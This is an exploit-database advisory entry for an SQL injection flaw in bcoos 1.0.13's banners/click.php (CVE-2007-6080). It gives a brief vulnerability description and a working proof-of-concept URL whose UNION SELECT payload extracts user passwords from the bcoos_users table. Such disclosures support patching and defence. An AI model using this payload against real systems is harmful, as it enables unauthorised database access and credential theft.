bcoos 1.0.13 - 'click.php' SQL Injection

Author: DeltahackingTEAM
type: webapps
platform: php
port: 
date_added: 2008-10-27  
date_updated: 2017-01-04  
verified: 1  
codes: CVE-2007-6080;OSVDB-39296  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32536.txt  
source: https://www.securityfocus.com/bid/31941/info

The 'bcoos' program is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects bcoos 1.0.13; other versions may also be affected.

http://www.example.com/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/*